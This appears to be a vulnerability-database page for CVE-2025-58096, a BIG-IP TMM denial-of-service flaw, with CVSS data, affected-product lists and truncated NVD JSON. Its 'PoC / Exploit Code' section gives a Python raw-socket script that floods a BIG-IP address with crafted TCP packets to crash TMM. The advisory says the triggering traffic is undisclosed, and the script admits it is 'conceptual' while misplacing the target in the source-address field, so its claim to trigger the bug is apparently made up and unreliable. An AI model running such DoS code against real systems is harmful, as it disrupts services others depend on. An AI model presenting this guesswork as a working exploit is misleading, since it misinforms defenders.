CVE-2025-58096

Description

When the database variable tm.tcpudptxchecksum is configured as non-default value Software-only on a BIG-IP system, undisclosed traffic can cause the Traffic Management Microkernel (TMM) to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:* - VULNERABLE

F5 BIG-IP（具体受影响版本请参考F5官方公告K000156691）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-58096 - F5 BIG-IP TMM DoS PoC
# This PoC demonstrates how to trigger TMM termination via crafted network traffic
# when tm.tcpudptxchecksum is set to "Software-only" mode.
# Note: This is a conceptual PoC. Actual exploitation requires specific packet crafting
# targeting the checksum calculation path in TMM.

import socket
import struct
import sys

TARGET_HOST = "192.168.1.100"  # BIG-IP Virtual Server IP
TARGET_PORT = 443              # Target service port

def craft_malicious_packet():
    """
    Craft a network packet designed to trigger the vulnerability
    in TMM's software-based checksum processing path.
    """
    # IP Header
    ip_header = struct.pack(
        '!BBHHHBBH4s4s',
        0x45,           # Version + IHL
        0x00,           # DSCP/ECN
        0x0028,         # Total Length (40 bytes)
        0x1234,         # Identification
        0x4000,         # Flags + Fragment Offset (Don't Fragment)
        64,             # TTL
        6,              # Protocol (TCP)
        0,              # Header Checksum (will calculate)
        socket.inet_aton(TARGET_HOST),
        socket.inet_aton("10.0.0.1")
    )

    # TCP Header with crafted checksum to trigger vulnerability
    tcp_header = struct.pack(
        '!HHIIBBHHH',
        443,            # Source Port
        TARGET_PORT,    # Destination Port
        0x00000001,     # Sequence Number
        0x00000000,     # Acknowledgment Number
        0x50,           # Data Offset (5 words)
        0x18,           # Flags (PSH+ACK)
        65535,          # Window Size
        0xFFFF,         # Checksum (crafted to trigger bug)
        0x0000          # Urgent Pointer
    )

    return ip_header + tcp_header

def trigger_dos():
    """Send crafted packets to trigger TMM termination"""
    print(f"[*] Targeting BIG-IP at {TARGET_HOST}:{TARGET_PORT}")
    print("[*] Sending crafted packets to trigger CVE-2025-58096...")

    sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)

    for i in range(10):
        try:
            packet = craft_malicious_packet()
            sock.sendto(packet, (TARGET_HOST, TARGET_PORT))
            print(f"[+] Packet {i+1} sent")
        except Exception as e:
            print(f"[-] Error: {e}")
            break

    print("[*] Attack completed. Check target TMM status.")

if __name__ == "__main__":
    trigger_dos()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-58096
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-58096
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-58096/
[4] VulDB https://vuldb.com/cve/CVE-2025-58096
[5] https://my.f5.com/manage/s/article/K000156691

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-58096", "sourceIdentifier": "[email protected]", "published": "2025-10-15T14:15:52.327", "lastModified": "2025-10-21T19:30:28.773", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "When the database variable tm.tcpudptxchecksum is configured as non-default value Software-only on a BIG-IP system, undisclosed traffic can cause the Traffic Management Microkernel (TMM) to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "A7A0C1CA-EDEF-463F-B7C8-8B9E67239FC1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "6538FBFE-AE3F-41DC-BE48-8A2444DE1F39"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "8CDAF78A-6C2B-4640-93DD-524A0D9D80CE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "4BEC05AA-EB63-4A34-94E8-81606329BA75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "F3007970-0661-4CAC-91A6-363396ED3B41"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "2450DC77-B46C-4886-AC9A-CF78B1EC4F06"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_application_visibility_and_reporting:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "D8BC9B56-DC91-4312-9A37-0892E1DCC97D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_automation_toolchain:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "B5C25C2C-608A-432F-B49C-CED71150801C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_carrier-grade_nat:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "96D77245-3641-49B9-BC32-472D460E5C1F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_container_ingress_services:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCr ... (truncated)